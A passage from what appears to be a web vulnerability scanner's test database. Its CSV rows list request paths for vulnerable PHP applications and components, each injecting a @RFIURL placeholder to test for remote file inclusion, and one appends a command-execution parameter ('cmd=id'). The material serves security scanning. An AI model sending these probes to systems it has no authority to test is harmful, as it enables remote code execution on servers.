Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004425\",\"5292\",\"c\",\"/classifieds/index.php?lowerTemplate=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004426\",\"5292\",\"c\",\"/clear.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004427\",\"5292\",\"c\",\"/clearinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004428\",\"5292\",\"c\",\"/click.php?dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004429\",\"5292\",\"c\",\"/client.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004430\",\"5292\",\"c\",\"/client/faq_1/PageController.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004431\",\"5292\",\"c\",\"/clients/index.php?src=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004432\",\"5292\",\"c\",\"/cls_fast_template.php?fname=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004433\",\"5292\",\"c\",\"/cm68news/engine/oldnews.inc.php?addpath=@RFIURL?&\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004434\",\"5292\",\"c\",\"/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004435\",\"5292\",\"c\",\"/cms/meetweb/classes/ManagerResource.class.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004436\",\"5292\",\"c\",\"/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004437\",\"5292\",\"c\",\"/cms/meetweb/classes/RegForm.class.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004438\",\"5292\",\"c\",\"/cms/meetweb/classes/RegResource.class.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004439\",\"5292\",\"c\",\"/cms/meetweb/classes/RegRightsResource.class.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004440\",\"5292\",\"c\",\"/cms/meetweb/classes/modules.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004441\",\"5292\",\"c\",\"/cms/modules/form.lib.php?sourceFolder=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004442\",\"5292\",\"c\",\"/cms/system/openengine.php?oe_classpath=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004443\",\"5292\",\"c\",\"/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004444\",\"5292\",\"c\",\"/cn_config.php?tpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004445\",\"5292\",\"c\",\"/coast/header.php?sections_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004446\",\"5292\",\"c\",\"/code/berylium-classes.php?beryliumroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004447\",\"5292\",\"c\",\"/code/berylium-classes.php?beryliumroot=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004448\",\"5292\",\"c\",\"/code/display.php?admindir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004449\",\"5292\",\"c\",\"/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004450\",\"5292\",\"c\",\"/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004451\",\"5292\",\"c\",\"/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004452\",\"5292\",\"c\",\"/com_media_library/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004453\",\"5292\",\"c\",\"/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004454\",\"5292\",\"c\",\"/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004455\",\"5292\",\"c\",\"/comments.php?AMG_serverpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004456\",\"5292\",\"c\",\"/comments.php?scriptpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004457\",\"5292\",\"c\",\"/common.inc.php?CFG[libdir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004458\",\"5292\",\"c\",\"/common.inc.php?CFG[libdir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004459\",\"5292\",\"c\",\"/common.inc.php?base_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004460\",\"5292\",\"c\",\"/common.php?db_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004461\",\"5292\",\"c\",\"/common.php?dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004462\",\"5292\",\"c\",\"/common.php?ezt_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004463\",\"5292\",\"c\",\"/common.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004464\",\"5292\",\"c\",\"/common.php?livealbum_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004465\",\"5292\",\"c\",\"/common.php?livealbum_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004466\",\"5292\",\"c\",\"/common.php?locale=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004467\",\"5292\",\"c\",\"/common.php?phpht_real_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004468\",\"5292\",\"c\",\"/common/db.php?commonpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004469\",\"5292\",\"c\",\"/common/func.php?CommonAbsD=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004470\",\"5292\",\"c\",\"/common/func.php?CommonAbsDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004471\",\"5292\",\"c\",\"/community/Offline.php?sourcedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004472\",\"5292\",\"c\",\"/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004473\",\"5292\",\"c\",\"/components/calendar/com_calendar.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004474\",\"5292\",\"c\",\"/components/calendar/com_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004475\",\"5292\",\"c\",\"/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004476\",\"5292\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004477\",\"5292\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004478\",\"5292\",\"c\",\"/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004479\",\"5292\",\"c\",\"/components/com_articles.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004480\",\"5292\",\"c\",\"/components/com_articles.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004481\",\"5292\",\"c\",\"/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004482\",\"5292\",\"c\",\"/components/com_calendar.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004483\",\"5292\",\"c\",\"/components/com_calendar.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004484\",\"5292\",\"c\",\"/components/com_cpg/cpg.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004485\",\"5292\",\"c\",\"/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004486\",\"5292\",\"c\",\"/components/com_facileforms/facileforms.frame.php?ff_compath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004487\",\"5292\",\"c\",\"/components/com_forum/download.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004488\",\"5292\",\"c\",\"/components/com_galleria/galleria.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004489\",\"5292\",\"c\",\"/components/com_guestbook.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004490\",\"5292\",\"c\",\"/components/com_hashcash/server.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004491\",\"5292\",\"c\",\"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004492\",\"5292\",\"c\",\"/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004493\",\"5292\",\"c\",\"/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004494\",\"5292\",\"c\",\"/components/com_joomlaboard/file_upload.php?sbp=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004495\",\"5292\",\"c\",\"/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004496\",\"5292\",\"c\",\"/components/com_lm/archive.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004497\",\"5292\",\"c\",\"/components/com_mambowiki/MamboLogin.php?IP=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004498\",\"5292\",\"c\",\"/components/com_minibb.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004499\",\"5292\",\"c\",\"/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004500\",\"5292\",\"c\",\"/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004501\",\"5292\",\"c\",\"/components/com_mospray/scripts/admin.php?basedir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004502\",\"5292\",\"c\",\"/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004503\",\"5292\",\"c\",\"/components/com_mp3_allopass/allopass.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004504\",\"5292\",\"c\",\"/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004505\",\"5292\",\"c\",\"/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004506\",\"5292\",\"c\",\"/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004507\",\"5292\",\"c\",\"/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004508\",\"5292\",\"c\",\"/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004509\",\"5292\",\"c\",\"/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004510\",\"5292\",\"c\",\"/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004511\",\"5292\",\"c\",\"/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004512\",\"5292\",\"c\",\"/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004513\",\"5292\",\"c\",\"/components/com_smf/smf.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004514\",\"5292\",\"c\",\"/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004515\",\"5292\",\"c\",\"/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004516\",\"5292\",\"c\",\"/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004517\",\"5292\",\"c\",\"/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004518\",\"5292\",\"c\",\"/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004519\",\"5292\",\"c\",\"/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004520\",\"5292\",\"c\",\"/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004521\",\"5292\",\"c\",\"/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004522\",\"5292\",\"c\",\"/components/core/connect.php?language_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004523\",\"5292\",\"c\",\"/components/minibb/bb_plugins.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004524\",\"5292\",\"c\",\"/components/minibb/index.php?absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004525\",\"5292\",\"c\",\"/components/minibb/index.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004526\",\"5292\",\"c\",\"/components/xmlparser/loadparser.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004527\",\"5292\",\"c\",\"/compteur/mapage.php?chemin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004528\",\"5292\",\"c\",\"/conf.php?securelib=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004529\",\"5292\",\"c\",\"/conf.php?securelib=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004530\",\"5292\",\"c\",\"/config.inc.php3?rel_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004531\",\"5292\",\"c\",\"/config.inc.php?_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004532\",\"5292\",\"c\",\"/config.inc.php?path_escape=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004533\",\"5292\",\"c\",\"/config.inc.php?path_escape=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004534\",\"5292\",\"c\",\"/config.php?full_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004535\",\"5292\",\"c\",\"/config.php?full_path_to_db=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004536\",\"5292\",\"c\",\"/config.php?fullpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004537\",\"5292\",\"c\",\"/config.php?incpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004538\",\"5292\",\"c\",\"/config.php?path_to_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004539\",\"5292\",\"c\",\"/config.php?rel_path=@RFIURL?\",\"GET\",\"PHP 